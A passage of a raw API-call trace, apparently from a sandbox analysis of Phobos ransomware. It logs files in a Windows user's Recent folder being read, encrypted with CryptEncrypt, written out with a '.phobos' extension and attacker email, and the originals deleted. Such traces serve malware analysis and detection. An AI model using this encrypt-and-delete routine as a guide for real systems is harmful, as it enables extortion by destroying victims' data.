pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b28) returned 1 [0200.023] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.023] CryptEncrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.023] CryptDestroyKey (hKey=0xa32b28) returned 1 [0200.023] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.023] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.023] CloseHandle (hObject=0x170) returned 1 [0200.024] CloseHandle (hObject=0x120) returned 1 [0200.024] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a0ufU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a0ufu.lnk")) returned 1 [0200.025] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.027] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=702) returned 1 [0200.027] CloseHandle (hObject=0x120) returned 1 [0200.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk")) returned 0x20 [0200.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.027] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.027] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.028] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.028] ReadFile (in: hFile=0x120, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2be, lpOverlapped=0x0) returned 1 [0200.029] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2c0) returned 1 [0200.029] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2c0, lpOverlapped=0x0) returned 1 [0200.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b28) returned 1 [0200.030] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.030] CryptEncrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.030] CryptDestroyKey (hKey=0xa32b28) returned 1 [0200.030] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.030] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.030] CloseHandle (hObject=0x120) returned 1 [0200.030] CloseHandle (hObject=0x170) returned 1 [0200.030] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aB3Rdr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ab3rdr.lnk")) returned 1 [0200.031] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.032] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2560) returned 1 [0200.032] CloseHandle (hObject=0x170) returned 1 [0200.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk")) returned 0x20 [0200.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.033] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.033] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.033] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.034] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa00, lpOverlapped=0x0) returned 1 [0200.035] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10, dwBufLen=0xa10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa10) returned 1 [0200.035] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa10, lpOverlapped=0x0) returned 1 [0200.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b28) returned 1 [0200.036] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.036] CryptEncrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.036] CryptDestroyKey (hKey=0xa32b28) returned 1 [0200.036] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.036] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.036] CloseHandle (hObject=0x170) returned 1 [0200.036] CloseHandle (hObject=0x120) returned 1 [0200.036] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AePBE.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aepbe.lnk")) returned 1 [0200.037] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.091] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3864) returned 1 [0200.091] CloseHandle (hObject=0x120) returned 1 [0200.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk")) returned 0x20 [0200.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0200.091] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.091] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0200.092] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b28) returned 1 [0200.092] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.092] ReadFile (in: hFile=0x120, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf18, lpOverlapped=0x0) returned 1 [0200.093] CryptEncrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20, dwBufLen=0xf20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20) returned 1 [0200.094] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf20, lpOverlapped=0x0) returned 1 [0200.094] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32828) returned 1 [0200.094] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.094] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.094] CryptDestroyKey (hKey=0xa32828) returned 1 [0200.095] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.095] CryptDestroyKey (hKey=0xa32b28) returned 1 [0200.095] CloseHandle (hObject=0x120) returned 1 [0200.095] CloseHandle (hObject=0x170) returned 1 [0200.095] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AIcLQY1V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aiclqy1v.lnk")) returned 1 [0200.096] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.099] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3584) returned 1 [0200.099] CloseHandle (hObject=0xfc) returned 1 [0200.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms")) returned 0x20 [0200.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.099] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.099] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.100] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.100] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.100] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe00, lpOverlapped=0x0) returned 1 [0200.163] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10, dwBufLen=0xe10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10) returned 1 [0200.163] WriteFile (in: hFile=0x100, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe10, lpOverlapped=0x0) returned 1 [0200.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0200.164] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.164] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0200.164] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.164] WriteFile (in: hFile=0x100, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0200.164] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.164] CloseHandle (hObject=0xfc) returned 1 [0200.164] CloseHandle (hObject=0x100) returned 1 [0200.165] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms")) returned 1 [0200.166] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.167] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3706) returned 1 [0200.167] CloseHandle (hObject=0x100) returned 1 [0200.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk")) returned 0x20 [0200.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.168] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.168] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.169] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.169] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.169] ReadFile (in: hFile=0x100, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe7a, lpOverlapped=0x0) returned 1 [0200.174] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe80, dwBufLen=0xe80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe80) returned 1 [0200.174] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe80, lpOverlapped=0x0) returned 1 [0200.175] CryptImportKey (in: 